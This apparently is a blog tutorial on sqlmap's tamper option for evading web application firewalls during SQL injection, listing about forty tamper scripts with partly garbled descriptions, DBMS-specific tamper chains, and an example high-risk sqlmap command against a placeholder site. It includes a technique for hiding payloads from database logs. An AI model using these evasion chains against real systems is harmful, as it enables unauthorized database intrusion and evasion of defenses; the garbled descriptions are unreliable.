SQLmap tamper script for bypassing WAF

by do son · Published · Updated

sqlmap tamper

Tamper injection data

Option: –tamper

sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their CHAR()-alike representation. More information about programming you can find on Thoughtsoncloud.

This option can be very useful and powerful in situations where there is a weak input validation mechanism between you and the back-end database management system. This mechanism usually is a self-developed input validation routine called by the application source code, an expensive enterprise-grade IPS appliance or a web application firewall (WAF). All buzzwords to define the same concept, implemented in a different way and costing lots of money, usually.

To take advantage of this option, provide sqlmap with a comma-separated list of tamper scripts and this will process the payload and return it transformed. You can define your own tamper scripts, use sqlmap ones from the tamper/ folder or edit them as long as you concatenate them comma-separated as a value of the option --tamper (e.g. --tamper="between,randomcase").

Here are the list tamper injection data

  1. apostrophemask.py replace single quote character in UTF-8-byte characters
  2. apostrophenullencode.py replace single-quote character with an illegal double-byte Unicode characters
  3. appendnullbyte.py, add a null character at the end of payload encoding
  4. base64encode.py use Base64 encoding for a given payload all characters
  5. between.py, “the BETWEEN the AND # #” is replaced with “NOT BETWEEN 0 AND #” replace greater-than sign “>” equal sign “=”
  6. bluecoat.py After the SQL statements replace spaces with valid random whitespace, followed by “the LIKE” Alternatively equal sign “=”
  7. chardoubleencode.py use double URL encoding for a given payload all characters (not handle characters already encoded)
  8. charencode.py use URL encoding for a given payload all characters (not handle characters already encoded)
  9. charunicodeencode.py use Unicode URL encoding for a given payload of non-coded character (the character does not handle already encoded)
  10. concat2concatws.py with Examples “CONCAT_WS (MID (CHAR (0 ), 0, 0), A, B)” replacement image “CONCAT (A, B)” is
  11. equaltolike.py with “the LIKE” operator replace all equal sign “=”
  12. greatest.py Alternatively greater than “>” use “GREATEST” function
  13. halfversionedmorekeywords.py add MySQL comments before each keyword
  14. ifnull2ifisnull.py with “IF (ISNULL (A), B, A)” replacement image “IFNULL (A, B)” Examples
  15. lowercase.py replace the value of each keyword character lowercase
  16. modsecurityversioned.py surrounded by complete query with a comment
  17. modsecurityzeroversioned.py comments with zero digits of which is surrounded by a full inquiry
  18. multiplespaces.py add more spaces around SQL keywords
  19. nonrecursivereplacement.py replace the predefined keywords using SQL representations, a filter suitable for
  20. overlongutf8.py conversion to all characters in a given payload among
  21. percentage.py add a percent sign before each character
  22. randomcase.py random character case conversion for each keyword
  23. randomcomments.py insert random comments to SQL keywords
  24. securesphere.py add the string through a special configuration
  25. sp_password.py Appends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logs
  26. space2comment.py replace spaces with “/ ** /”
  27. space2dash.py dash comment character “-” followed by a linefeed a random string of characters and replace the space character
  28. space2hash.py pounds comment character “#” followed by a linefeed a random string of characters and replace the space character
  29. space2morehash.py pounds comment character “#” followed by a linefeed a random string of characters and replace the space character
  30. space2mssqlblank.py replace spaces with a set of valid candidate among the set of random character whitespace
  31. space2mssqlhash.py pounds comment symbol “#” followed by a space character to replace newline
  32. space2mysqlblank.py replace spaces with a set of valid candidate among the set of random character whitespace
  33. space2mysqldash.py dash comment character “-” followed by a linefeed character replace spaces
  34. space2plus.py a plus “+” with spaces
  35. space2randomblank.py replace spaces with a set of valid candidate among the set of random character whitespace
  36. unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT
  37. unmagicquotes.py use a combination of multi-byte% bf% 27 and the end of general note replaced with spaces
  38. varnish.py add an HTTP header “X-originating-IP” to bypass WAF
  39. versionedkeywords.py surrounding each non-comment function key with MySQL
  40. versionedmorekeywords.py surrounded by each keyword with a MySQL Notes

Usage

MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

 

MySQL:

 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

 

General Tamper testing:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

 

Example:

sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

 

Reference:

  • https://github.com/sqlmapproject/sqlmap/tree/master/tamper
  • https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423

Tags: sqlisqlmapsqlmap tamper data